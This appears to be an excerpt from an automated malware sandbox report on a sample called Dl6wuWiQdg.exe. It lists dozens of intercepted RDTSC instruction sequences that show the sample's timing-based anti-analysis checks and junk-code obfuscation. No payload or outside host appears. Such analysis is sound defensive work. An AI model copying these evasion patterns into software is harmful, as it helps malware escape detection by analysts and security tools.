                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC8810 second address: FC8816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC9EEE second address: FC9EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC9EF5 second address: FC9EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC9EFD second address: FC9F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC9F02 second address: FC9F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FC9F08 second address: FC9F30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F36B8869C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jno 00007F36B8869BF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6061E second address: F60622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F60622 second address: F6064A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F36B8869BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F36B8869C02h 0x00000010 jo 00007F36B8869BF6h 0x00000016 pop eax 0x00000017 push edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF0A6 second address: FCF0CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 jmp 00007F36B8D8D08Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF0CC second address: FCF0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF387 second address: FCF38E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF38E second address: FCF3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C00h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F36B8869BF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF3AD second address: FCF3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF52B second address: FCF544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F36B8869C03h 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF7F7 second address: FCF804 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF915 second address: FCF919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF919 second address: FCF929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F36B8D8D086h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF929 second address: FCF933 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36B8869BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF933 second address: FCF949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F36B8D8D086h 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCF949 second address: FCF950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCFEBF second address: FCFF0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8D8D09Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007F36B8D8D098h 0x00000011 jmp 00007F36B8D8D090h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F36B8D8D08Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCFF0A second address: FCFF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCFF0E second address: FCFF18 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36B8D8D086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8031A second address: F8034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F36B8869C03h 0x0000000f jbe 00007F36B8869BF6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8034F second address: F8035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8035A second address: F80360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F80360 second address: F8036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F36B8D8D08Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCECE6 second address: FCECEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FCECEA second address: FCECF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F36B8D8D092h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F51601 second address: F51605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F51605 second address: F5161C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F36B8D8D08Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FD81ED second address: FD81F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F56792 second address: F56796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9ACAA second address: F9AD56 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F36B8869C0Ah 0x00000008 jmp 00007F36B8869C04h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebx 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F36B8869BF8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov dword ptr [ebp+122D31B7h], ecx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov dword ptr [ebp+122D3327h], ecx 0x00000046 mov dword ptr [ebp+124858ACh], esp 0x0000004c pushad 0x0000004d mov dh, bh 0x0000004f mov dword ptr [ebp+122D27A6h], edx 0x00000055 popad 0x00000056 cmp dword ptr [ebp+122D2BAFh], 00000000h 0x0000005d jne 00007F36B8869CAFh 0x00000063 mov edi, dword ptr [ebp+122D29DDh] 0x00000069 mov byte ptr [ebp+122D20E7h], 00000047h 0x00000070 mov dword ptr [ebp+122D29C3h], edi 0x00000076 mov eax, D49AA7D2h 0x0000007b mov cl, 63h 0x0000007d nop 0x0000007e pushad 0x0000007f jng 00007F36B8869BFCh 0x00000085 jo 00007F36B8869BF8h 0x0000008b push edi 0x0000008c pop edi 0x0000008d popad 0x0000008e push eax 0x0000008f push eax 0x00000090 push edx 0x00000091 push edx 0x00000092 push ebx 0x00000093 pop ebx 0x00000094 pop edx 0x00000095 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9AD56 second address: F9AD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9B2C8 second address: F9B2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9B2CC second address: F9B2D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9B342 second address: F9B348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9B42A second address: F9B430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9BE81 second address: F9BE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9BE8F second address: F9BF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F36B8D8D088h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12485898h] 0x0000002a mov dx, di 0x0000002d push eax 0x0000002e jmp 00007F36B8D8D08Ah 0x00000033 mov dword ptr [esp], eax 0x00000036 jmp 00007F36B8D8D097h 0x0000003b lea eax, dword ptr [ebp+12485854h] 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F36B8D8D088h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov edx, dword ptr [ebp+122D2A23h] 0x00000061 nop 0x00000062 jmp 00007F36B8D8D099h 0x00000067 push eax 0x00000068 jnp 00007F36B8D8D09Ah 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F36B8D8D08Ch 0x00000075 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9BF50 second address: F8031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb di, 7311h 0x0000000c call dword ptr [ebp+122D2EC5h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FD78BA second address: FD78C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FD78C0 second address: FD78CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FD7C8A second address: FD7C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDDFA3 second address: FDDFC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F36B8869BF6h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDDFC9 second address: FDDFED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F36B8D8D092h 0x00000011 jnc 00007F36B8D8D086h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDE4B1 second address: FDE4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDDB35 second address: FDDB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F36B8D8D086h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDDB42 second address: FDDB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDDB46 second address: FDDB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F36B8D8D08Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDE9E1 second address: FDE9EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F36B8869BF6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDE9EB second address: FDE9EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FDE9EF second address: FDE9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FE2AE6 second address: FE2AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FE2AEC second address: FE2B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F36B8869BF6h 0x00000009 jo 00007F36B8869BF6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F36B8869C02h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F36B8869BFCh 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FE2B22 second address: FE2B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F36B8D8D099h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FE2B43 second address: FE2B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEBE9E second address: FEBEA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEBEA2 second address: FEBEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F36B8869C00h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEBEBC second address: FEBEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEC00A second address: FEC018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F36B8869BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEC2F4 second address: FEC2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEC2FA second address: FEC2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEC75E second address: FEC764 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEC764 second address: FEC79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8869BFEh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F36B8869C09h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FEC79C second address: FEC7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF1B1C second address: FF1B50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F36B8869C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36B8869C05h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF1B50 second address: FF1B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF1F59 second address: FF1F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F36B8869BFFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jc 00007F36B8869BF6h 0x00000016 pop eax 0x00000017 jmp 00007F36B8869C02h 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF2431 second address: FF2437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF2591 second address: FF2595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF2595 second address: FF25BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F36B8D8D09Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF25BB second address: FF25BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF25BF second address: FF25C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF25C5 second address: FF25D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF25D1 second address: FF25D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF5C5B second address: FF5C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF5DD3 second address: FF5DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF5DD7 second address: FF5DFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F36B8869C09h 0x0000000c jo 00007F36B8869BF6h 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF5DFE second address: FF5E16 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F36B8D8D093h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F36B8D8D08Bh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF5E16 second address: FF5E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F36B8869BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FF6252 second address: FF6262 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F36B8D8D086h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBB62 second address: FFBB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBB66 second address: FFBB72 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8D8D086h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBB72 second address: FFBB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869C02h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBB8A second address: FFBB90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
